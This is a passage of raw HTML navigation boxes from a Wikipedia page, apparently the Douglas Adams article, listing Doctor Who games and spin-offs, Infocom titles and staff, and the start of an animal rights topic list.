href=\"/wiki/Doctor_Who_and_the_Warlord\" title=\"Doctor Who and the Warlord\">The 
Warlord</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who_and_the_Mines_of_Terror\" title=\"Doctor Who and the Mines of Terror\">The Mines of Terror</a></i></li>\n<li><i><a href=\"/wiki/Dalek_Attack\" title=\"Dalek Attack\">Dalek Attack</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_Destiny_of_the_Doctors\" title=\"Doctor Who: Destiny of the Doctors\">Destiny of the Doctors</a></i></li>\n<li><i><a href=\"/wiki/Top_Trumps:_Doctor_Who\" title=\"Top Trumps: Doctor Who\">Top Trumps</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_The_Adventure_Games\" title=\"Doctor Who: The Adventure Games\">The Adventure Games</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_Return_to_Earth\" title=\"Doctor Who: Return to Earth\">Return to Earth</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_Evacuation_Earth\" title=\"Doctor Who: Evacuation Earth\">Evacuation Earth</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_The_Mazes_of_Time\" title=\"Doctor Who: The Mazes of Time\">The Mazes of Time</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_Worlds_in_Time\" title=\"Doctor Who: Worlds in Time\">Worlds in Time</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_The_Eternity_Clock\" title=\"Doctor Who: The Eternity Clock\">The Eternity Clock</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_Legacy_(video_game)\" title=\"Doctor Who: Legacy (video game)\">Doctor Who: Legacy</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"width:10em;padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Miscellaneous</div>\n</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Doctor_Who_spin-offs\" title=\"Doctor Who spin-offs\"><i>Doctor Who</i> spin-offs</a>\n<ul>\n<li><i><a href=\"/wiki/Dimensions_in_Time\" title=\"Dimensions in Time\">Dimensions in 
Time</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who:_The_Curse_of_Fatal_Death\" title=\"Doctor Who: The Curse of Fatal Death\">The Curse of Fatal Death</a></i></li>\n<li><i><a href=\"/wiki/Scream_of_the_Shalka\" title=\"Scream of the Shalka\">Scream of the Shalka</a></i></li>\n</ul>\n</li>\n<li><a href=\"/wiki/Doctor_Who_(pinball)\" title=\"Doctor Who (pinball)\">Pinball</a></li>\n<li><a href=\"/wiki/Doctor_Who:_The_Card_Game\" title=\"Doctor Who: The Card Game\">Card game</a></li>\n<li><a href=\"/wiki/List_of_Doctor_Who_parodies\" title=\"List of Doctor Who parodies\">Spoofs</a></li>\n<li><a href=\"/wiki/List_of_companions_in_Doctor_Who_spin-offs\" title=\"List of companions in Doctor Who spin-offs\">Spin-off companions</a></li>\n<li><a href=\"/wiki/Faction_Paradox\" title=\"Faction Paradox\">Faction Paradox</a></li>\n<li><a href=\"/wiki/Iris_Wildthyme\" title=\"Iris Wildthyme\">Iris Wildthyme</a></li>\n<li><a href=\"/wiki/Death%27s_Head\" title=\"Death's Head\">Death's Head</a></li>\n<li><a href=\"/wiki/Dalek_comic_strips,_illustrated_annuals_and_graphic_novels\" title=\"Dalek comic strips, illustrated annuals and graphic novels\">Dalek comic strips, illustrated annuals and graphic novels</a></li>\n<li><i><a href=\"/wiki/Star_Trek:_The_Next_Generation/Doctor_Who:_Assimilation2\" title=\"Star Trek: The Next Generation/Doctor Who: Assimilation2\">Star Trek: The Next Generation/Doctor Who: Assimilation2</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Related<br />\npublications</th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"width:10em;padding-left:0;padding-right:0;\">\n<div 
style=\"padding:0em 0.75em;\">Magazines</div>\n</th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Doctor_Who_Magazine\" title=\"Doctor Who Magazine\">Doctor Who Magazine</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who_Adventures\" title=\"Doctor Who Adventures\">Doctor Who Adventures</a></i></li>\n<li><i><a href=\"/wiki/Doctor_Who_%E2%80%93_Battles_in_Time\" title=\"Doctor Who – Battles in Time\">Doctor Who – Battles in Time</a></i></li>\n<li><i><a href=\"/wiki/The_Black_Archive\" title=\"The Black Archive\">The Black Archive</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"width:10em;padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Publishers</div>\n</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Big_Finish_Productions\" title=\"Big Finish Productions\">Big Finish Productions</a></li>\n<li><a href=\"/wiki/Reeltime_Pictures\" title=\"Reeltime Pictures\">Reeltime Pictures</a></li>\n<li><a href=\"/wiki/Bill_%26_Ben_Video\" title=\"Bill & Ben Video\">BBV</a></li>\n<li><a href=\"/wiki/Mad_Norwegian_Press\" title=\"Mad Norwegian Press\">Mad Norwegian Press</a></li>\n<li><a href=\"/wiki/Magic_Bullet_Productions\" title=\"Magic Bullet Productions\">Magic Bullet Productions</a></li>\n<li><a href=\"/wiki/Obverse_Books\" title=\"Obverse Books\">Obverse Books</a></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<td class=\"navbox-abovebelow\" colspan=\"2\">\n<div>\n<ul>\n<li><img alt=\"Portal\" 
src=\"//upload.wikimedia.org/wikipedia/en/thumb/f/fd/Portal-puzzle.svg/16px-Portal-puzzle.svg.png\" title=\"Portal\" width=\"16\" height=\"14\" srcset=\"//upload.wikimedia.org/wikipedia/en/thumb/f/fd/Portal-puzzle.svg/24px-Portal-puzzle.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/f/fd/Portal-puzzle.svg/32px-Portal-puzzle.svg.png 2x\" data-file-width=\"32\" data-file-height=\"28\" /> <a href=\"/wiki/Portal:Doctor_Who\" title=\"Portal:Doctor Who\">Portal</a></li>\n<li><img alt=\"Category\" src=\"//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/16px-Folder_Hexagonal_Icon.svg.png\" title=\"Category\" width=\"16\" height=\"14\" srcset=\"//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/24px-Folder_Hexagonal_Icon.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/32px-Folder_Hexagonal_Icon.svg.png 2x\" data-file-width=\"36\" data-file-height=\"31\" /> <a href=\"/wiki/Category:Doctor_Who\" title=\"Category:Doctor Who\">Category</a></li>\n<li><img alt=\"Wikipedia book\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/8/89/Symbol_book_class2.svg/16px-Symbol_book_class2.svg.png\" title=\"Wikipedia book\" width=\"16\" height=\"16\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/8/89/Symbol_book_class2.svg/23px-Symbol_book_class2.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/8/89/Symbol_book_class2.svg/31px-Symbol_book_class2.svg.png 2x\" data-file-width=\"180\" data-file-height=\"185\" /> <a href=\"/wiki/Book:Doctor_Who\" title=\"Book:Doctor Who\">Book</a></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Infocom\" style=\"padding:3px\">\n<table class=\"nowraplinks collapsible autocollapse navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"2\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li 
class=\"nv-view\"><a href=\"/wiki/Template:Infocom_games\" title=\"Template:Infocom games\"><abbr title=\"View this template\" style=\";;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/wiki/Template_talk:Infocom_games\" title=\"Template talk:Infocom games\"><abbr title=\"Discuss this template\" style=\";;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" href=\"//en.wikipedia.org/w/index.php?title=Template:Infocom_games&action=edit\"><abbr title=\"Edit this template\" style=\";;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Infocom\" style=\"font-size:114%\"><a href=\"/wiki/Infocom\" title=\"Infocom\">Infocom</a></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><i>Zork</i> series</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Zork\" title=\"Zork\">Zork</a></i></li>\n<li><i><a href=\"/wiki/Beyond_Zork\" title=\"Beyond Zork\">Beyond Zork</a></i></li>\n<li><i><a href=\"/wiki/Zork_Zero\" title=\"Zork Zero\">Zork Zero</a></i></li>\n<li><i><a href=\"/wiki/Return_to_Zork\" title=\"Return to Zork\">Return to Zork</a></i></li>\n<li><i><a href=\"/wiki/Zork_Nemesis\" title=\"Zork Nemesis\">Zork Nemesis</a></i></li>\n<li><i><a href=\"/wiki/Zork:_Grand_Inquisitor\" title=\"Zork: Grand Inquisitor\">Zork: Grand Inquisitor</a></i></li>\n<li><i><a href=\"/wiki/Zork:_The_Undiscovered_Underground\" title=\"Zork: The Undiscovered Underground\">Zork: The Undiscovered Underground</a></i></li>\n<li><i><a href=\"/wiki/Legends_of_Zork\" title=\"Legends of Zork\">Legends of Zork</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" 
class=\"navbox-group\">Text adventures</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Arthur:_The_Quest_for_Excalibur\" title=\"Arthur: The Quest for Excalibur\">Arthur: The Quest for Excalibur</a></i></li>\n<li><i><a href=\"/wiki/Ballyhoo_(video_game)\" title=\"Ballyhoo (video game)\">Ballyhoo</a></i></li>\n<li><i><a href=\"/wiki/Border_Zone_(video_game)\" title=\"Border Zone (video game)\">Border Zone</a></i></li>\n<li><i><a href=\"/wiki/Bureaucracy_(video_game)\" title=\"Bureaucracy (video game)\">Bureaucracy</a></i></li>\n<li><i><a href=\"/wiki/Cutthroats\" title=\"Cutthroats\">Cutthroats</a></i></li>\n<li><i><a href=\"/wiki/Deadline_(video_game)\" title=\"Deadline (video game)\">Deadline</a></i></li>\n<li><i><a href=\"/wiki/Enchanter_(video_game)\" title=\"Enchanter (video game)\">Enchanter</a></i></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(video_game)\" title=\"The Hitchhiker's Guide to the Galaxy (video game)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/Hollywood_Hijinx\" title=\"Hollywood Hijinx\">Hollywood Hijinx</a></i></li>\n<li><i><a href=\"/wiki/Infidel_(video_game)\" title=\"Infidel (video game)\">Infidel</a></i></li>\n<li><i><a href=\"/wiki/Journey_(1989_video_game)\" title=\"Journey (1989 video game)\">Journey</a></i></li>\n<li><i><a href=\"/wiki/Leather_Goddesses_of_Phobos\" title=\"Leather Goddesses of Phobos\">Leather Goddesses of Phobos</a></i></li>\n<li><i><a href=\"/wiki/The_Lurking_Horror\" title=\"The Lurking Horror\">The Lurking Horror</a></i></li>\n<li><i><a href=\"/wiki/A_Mind_Forever_Voyaging\" title=\"A Mind Forever Voyaging\">A Mind Forever Voyaging</a></i></li>\n<li><i><a href=\"/wiki/Moonmist\" title=\"Moonmist\">Moonmist</a></i></li>\n<li><i><a href=\"/wiki/Nord_and_Bert_Couldn%27t_Make_Head_or_Tail_of_It\" 
title=\"Nord and Bert Couldn't Make Head or Tail of It\">Nord and Bert Couldn't Make Head or Tail of It</a></i></li>\n<li><i><a href=\"/wiki/Planetfall\" title=\"Planetfall\">Planetfall</a></i></li>\n<li><i><a href=\"/wiki/Plundered_Hearts\" title=\"Plundered Hearts\">Plundered Hearts</a></i></li>\n<li><i><a href=\"/wiki/Seastalker\" title=\"Seastalker\">Seastalker</a></i></li>\n<li><i><a href=\"/wiki/Sherlock:_The_Riddle_of_the_Crown_Jewels\" title=\"Sherlock: The Riddle of the Crown Jewels\">Sherlock: The Riddle of the Crown Jewels</a></i></li>\n<li><i><a href=\"/wiki/James_Clavell%27s_Sh%C5%8Dgun\" title=\"James Clavell's Shōgun\">James Clavell's Shōgun</a></i></li>\n<li><i><a href=\"/wiki/Sorcerer_(video_game)\" title=\"Sorcerer (video game)\">Sorcerer</a></i></li>\n<li><i><a href=\"/wiki/Spellbreaker\" title=\"Spellbreaker\">Spellbreaker</a></i></li>\n<li><i><a href=\"/wiki/Starcross_(video_game)\" title=\"Starcross (video game)\">Starcross</a></i></li>\n<li><i><a href=\"/wiki/Stationfall\" title=\"Stationfall\">Stationfall</a></i></li>\n<li><i><a href=\"/wiki/Suspect_(video_game)\" title=\"Suspect (video game)\">Suspect</a></i></li>\n<li><i><a href=\"/wiki/Suspended\" title=\"Suspended\">Suspended</a></i></li>\n<li><i><a href=\"/wiki/Trinity_(video_game)\" title=\"Trinity (video game)\">Trinity</a></i></li>\n<li><i><a href=\"/wiki/Wishbringer\" title=\"Wishbringer\">Wishbringer</a></i></li>\n<li><i><a href=\"/wiki/The_Witness_(1983_video_game)\" title=\"The Witness (1983 video game)\">The Witness</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Other titles</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/BattleTech:_The_Crescent_Hawk%27s_Inception\" title=\"BattleTech: The Crescent Hawk's 
Inception\">BattleTech: The Crescent Hawk's Inception</a></i></li>\n<li><i><a href=\"/wiki/BattleTech:_The_Crescent_Hawk%27s_Revenge\" title=\"BattleTech: The Crescent Hawk's Revenge\">BattleTech: The Crescent Hawk's Revenge</a></i></li>\n<li><i><a href=\"/wiki/Circuit%27s_Edge\" title=\"Circuit's Edge\">Circuit's Edge</a></i></li>\n<li><i><a href=\"/wiki/Cornerstone_(software)\" title=\"Cornerstone (software)\">Cornerstone</a></i></li>\n<li><i><a href=\"/wiki/Fooblitzky\" title=\"Fooblitzky\">Fooblitzky</a></i></li>\n<li><i><a href=\"/wiki/Leather_Goddesses_of_Phobos_2:_Gas_Pump_Girls_Meet_the_Pulsating_Inconvenience_from_Planet_X!\" title=\"Leather Goddesses of Phobos 2: Gas Pump Girls Meet the Pulsating Inconvenience from Planet X!\">Leather Goddesses of Phobos 2</a></i></li>\n<li><i><a href=\"/wiki/Mines_of_Titan\" title=\"Mines of Titan\">Mines of Titan</a></i></li>\n<li><i><a href=\"/wiki/Quarterstaff:_The_Tomb_of_Setmoth\" title=\"Quarterstaff: The Tomb of Setmoth\">Quarterstaff: The Tomb of Setmoth</a></i></li>\n<li><i><a href=\"/wiki/Tombs_%26_Treasure\" title=\"Tombs & Treasure\">Tombs & Treasure</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Implementer_(video_games)\" title=\"Implementer (video games)\">Implementers</a></th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Tim_Anderson_(Zork)\" title=\"Tim Anderson (Zork)\">Tim Anderson</a></li>\n<li><a href=\"/wiki/Bob_Bates\" title=\"Bob Bates\">Bob Bates</a></li>\n<li><a href=\"/wiki/Michael_Berlyn\" title=\"Michael Berlyn\">Michael Berlyn</a></li>\n<li><a href=\"/wiki/Marc_Blank\" title=\"Marc Blank\">Marc Blank</a></li>\n<li><a href=\"/wiki/Amy_Briggs\" title=\"Amy Briggs\">Amy Briggs</a></li>\n<li>Stu Galley</li>\n<li><a 
href=\"/wiki/Dave_Lebling\" title=\"Dave Lebling\">Dave Lebling</a></li>\n<li><a href=\"/wiki/Steve_Meretzky\" title=\"Steve Meretzky\">Steve Meretzky</a></li>\n<li><a href=\"/wiki/Brian_Moriarty\" title=\"Brian Moriarty\">Brian Moriarty</a></li>\n<li>Jeff O'Neill</li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Other people</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><strong class=\"selflink\">Douglas Adams</strong></li>\n<li><a href=\"/wiki/Bruce_Daniels\" title=\"Bruce Daniels\">Bruce Daniels</a></li>\n<li><a href=\"/wiki/Albert_Vezza\" title=\"Albert Vezza\">Albert Vezza</a></li>\n<li><a href=\"/wiki/Joe_Ybarra\" title=\"Joe Ybarra\">Joe Ybarra</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Companies</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Infocom\" title=\"Infocom\">Infocom</a></li>\n<li><a href=\"/wiki/Activision\" title=\"Activision\">Activision</a></li>\n<li><a href=\"/wiki/Legend_Entertainment\" title=\"Legend Entertainment\">Legend Entertainment</a></li>\n<li><a href=\"/wiki/Westwood_Studios\" title=\"Westwood Studios\">Westwood Studios</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Miscellaneous</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/69105_(number)\" title=\"69105 
(number)\">69,105</a></li>\n<li><i><a href=\"/wiki/Classic_Text_Adventure_Masterpieces_of_Infocom\" title=\"Classic Text Adventure Masterpieces of Infocom\">Classic Text Adventure Masterpieces of Infocom</a></i></li>\n<li><a href=\"/wiki/Feelie\" class=\"mw-redirect\" title=\"Feelie\">Feelie</a></li>\n<li><i><a href=\"/wiki/Get_Lamp\" title=\"Get Lamp\">Get Lamp</a></i></li>\n<li><a href=\"/wiki/Grue_(monster)\" title=\"Grue (monster)\">Grue</a></li>\n<li><a href=\"/wiki/Hello,_sailor\" title=\"Hello, sailor\">Hello, sailor</a></li>\n<li><a href=\"/wiki/InfoTaskForce\" title=\"InfoTaskForce\">InfoTaskForce</a></li>\n<li><a href=\"/wiki/InvisiClues\" title=\"InvisiClues\">InvisiClues</a></li>\n<li><i><a href=\"/wiki/The_Lost_Treasures_of_Infocom\" title=\"The Lost Treasures of Infocom\">The Lost Treasures of Infocom</a></i></li>\n<li><a href=\"/wiki/Z-machine\" title=\"Z-machine\">Z-machine</a></li>\n<li><a href=\"/wiki/Zork_books\" title=\"Zork books\">Zork books</a></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Animal_rights\" style=\"padding:3px\">\n<table class=\"nowraplinks collapsible collapsed navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"2\" style=\"text-align: center;\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li class=\"nv-view\"><a href=\"/wiki/Template:Animal_rights\" title=\"Template:Animal rights\"><abbr title=\"View this template\" style=\"text-align: center;;;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/wiki/Template_talk:Animal_rights\" title=\"Template talk:Animal rights\"><abbr title=\"Discuss this template\" style=\"text-align: center;;;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" 
href=\"//en.wikipedia.org/w/index.php?title=Template:Animal_rights&action=edit\"><abbr title=\"Edit this template\" style=\"text-align: center;;;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Animal_rights\" style=\"font-size:114%\"><a href=\"/wiki/Animal_rights\" title=\"Animal rights\">Animal rights</a></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Topics</th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\"><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">Overview</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Abolitionism_(animal_rights)\" title=\"Abolitionism (animal rights)\">Abolitionism</a></li>\n<li><a href=\"/wiki/Animal_protectionism\" title=\"Animal protectionism\">Animal protectionism</a></li>\n<li><a href=\"/wiki/Animal_welfare\" title=\"Animal welfare\">Animal welfare</a></li>\n<li><a href=\"/wiki/Speciesism\" title=\"Speciesism\">Speciesism</a></li>\n<li><a href=\"/wiki/Veganism\" title=\"Veganism\">Veganism</a></li>\n<li><b><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\"><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">Issues</a></th>\n<td class=\"navbox-list navbox-even\" 
style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Ahimsa\" title=\"Ahimsa\">Ahimsa</a></li>\n<li><a href=\"/wiki/Animal_cognition\" title=\"Animal cognition\">Animal cognition</a></li>\n<li><a href=\"/wiki/Animal_consciousness\" title=\"Animal consciousness\">Animal consciousness</a></li>\n<li><a href=\"/wiki/Animal_law\" title=\"Animal law\">Animal law</a></li>\n<li><a href=\"/wiki/Animal_model\" class=\"mw-redirect\" title=\"Animal model\">Animal model</a></li>\n<li><a href=\"/wiki/Animal_rights_and_the_Holocaust\" title=\"Animal rights and the Holocaust\">Animal rights and the Holocaust</a></li>\n<li><a href=\"/wiki/Animal_product\" title=\"Animal product\">Animal product</a></li>\n<li><a href=\"/wiki/Animal_rights_movement\" title=\"Animal rights movement\">Animal rights movement</a></li>\n<li><a href=\"/wiki/Animal_testing\" title=\"Animal testing\">Animal testing</a></li>\n<li><a href=\"/wiki/Animal_testing_on_non-human_primates\" title=\"Animal testing on non-human primates\">Animal testing on non-human primates</a></li>\n<li><a href=\"/wiki/Animals_in_sport\" title=\"Animals in sport\">Animals in sport</a></li>\n<li><a href=\"/wiki/Anthrozoology\" title=\"Anthrozoology\">Anthrozoology</a></li>\n<li><a href=\"/wiki/Anti-hunting\" class=\"mw-redirect\" title=\"Anti-hunting\">Anti-hunting</a></li>\n<li><a href=\"/wiki/Bile_bear\" title=\"Bile bear\">Bile bear</a></li>\n<li><a href=\"/wiki/Bioethics\" title=\"Bioethics\">Bioethics</a></li>\n<li><a href=\"/wiki/Blood_sport\" title=\"Blood sport\">Blood sport</a></li>\n<li><a href=\"/wiki/Cambridge_Declaration_on_Consciousness\" class=\"mw-redirect\" title=\"Cambridge Declaration on Consciousness\">Cambridge Declaration on Consciousness</a></li>\n<li><a href=\"/wiki/Carnism\" title=\"Carnism\">Carnism</a></li>\n<li><a href=\"/wiki/Testing_cosmetics_on_animals\" title=\"Testing cosmetics on 
animals\">Cosmetics testing</a></li>\n<li><a href=\"/wiki/Chick_culling\" title=\"Chick culling\">Chick culling</a></li>\n<li><a href=\"/wiki/Christianity_and_animal_rights\" title=\"Christianity and animal rights\">Christianity and animal rights</a></li>\n<li><a href=\"/wiki/Concentrated_Animal_Feeding_Operation\" class=\"mw-redirect\" title=\"Concentrated Animal Feeding Operation\">Concentrated Animal Feeding Operation</a></li>\n<li><a href=\"/wiki/Cormorant_culling\" title=\"Cormorant culling\">Cormorant culling</a></li>\n<li><a href=\"/wiki/Covance\" title=\"Covance\">Covance</a></li>\n<li><a href=\"/wiki/Cruelty_to_animals\" title=\"Cruelty to animals\">Cruelty to animals</a></li>\n<li><a href=\"/wiki/Deep_ecology\" title=\"Deep ecology\">Deep ecology</a></li>\n<li><a href=\"/wiki/Ethics_of_eating_meat\" title=\"Ethics of eating meat\">Ethics of eating meat</a></li>\n<li><a href=\"/wiki/Fox_hunting\" title=\"Fox hunting\">Fox hunting</a></li>\n<li><a href=\"/wiki/Fur_trade\" title=\"Fur trade\">Fur trade</a></li>\n<li><a href=\"/wiki/Great_ape_research_ban\" title=\"Great ape research ban\">Great ape research ban</a></li>\n<li><a href=\"/wiki/Green_Scare\" title=\"Green Scare\">Green Scare</a></li>\n<li><a href=\"/wiki/Huntingdon_Life_Sciences\" title=\"Huntingdon Life Sciences\">Huntingdon Life Sciences</a></li>\n<li><a href=\"/wiki/Intensive_animal_farming\" title=\"Intensive animal farming\">Intensive animal farming</a></li>\n<li><a href=\"/wiki/Ivory_trade\" title=\"Ivory trade\">Ivory trade</a></li>\n<li><a href=\"/wiki/Livestock\" title=\"Livestock\">Livestock</a></li>\n<li><a href=\"/wiki/Meat_paradox\" class=\"mw-redirect\" title=\"Meat paradox\">Meat paradox</a></li>\n<li><a href=\"/wiki/Nafovanny\" title=\"Nafovanny\">Nafovanny</a></li>\n<li><a href=\"/wiki/Nonviolence\" title=\"Nonviolence\">Nonviolence</a></li>\n<li><a href=\"/wiki/Open_rescue\" title=\"Open rescue\">Open rescue</a></li>\n<li><a href=\"/wiki/Operation_Backfire_(FBI)\" 
title=\"Operation Backfire (FBI)\">Operation Backfire</a></li>\n<li><a href=\"/wiki/Pain_in_animals\" title=\"Pain in animals\">Pain in animals</a></li>\n<li><a href=\"/wiki/Pain_and_suffering_in_laboratory_animals\" class=\"mw-redirect\" title=\"Pain and suffering in laboratory animals\">Pain and suffering in laboratory animals</a></li>\n<li><a href=\"/wiki/International_primate_trade\" title=\"International primate trade\">Primate trade</a></li>\n<li><a href=\"/wiki/Seal_hunting\" title=\"Seal hunting\">Seal hunting</a></li>\n<li><a href=\"/wiki/Slaughterhouse\" title=\"Slaughterhouse\">Slaughterhouse</a></li>\n<li><a href=\"/wiki/Stock-free_agriculture\" class=\"mw-redirect\" title=\"Stock-free agriculture\">Stock-free agriculture</a></li>\n<li><a href=\"/wiki/Toxicology_testing\" title=\"Toxicology testing\">Toxicology testing</a></li>\n<li><a href=\"/wiki/Veganarchism\" title=\"Veganarchism\">Veganarchism</a></li>\n<li><a href=\"/wiki/Veganism\" title=\"Veganism\">Veganism</a></li>\n<li><a href=\"/wiki/Vegetarianism\" title=\"Vegetarianism\">Vegetarianism</a></li>\n<li><a href=\"/wiki/Western_Australian_shark_cull\" title=\"Western Australian shark cull\">Western Australian shark cull</a></li>\n<li><b><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: 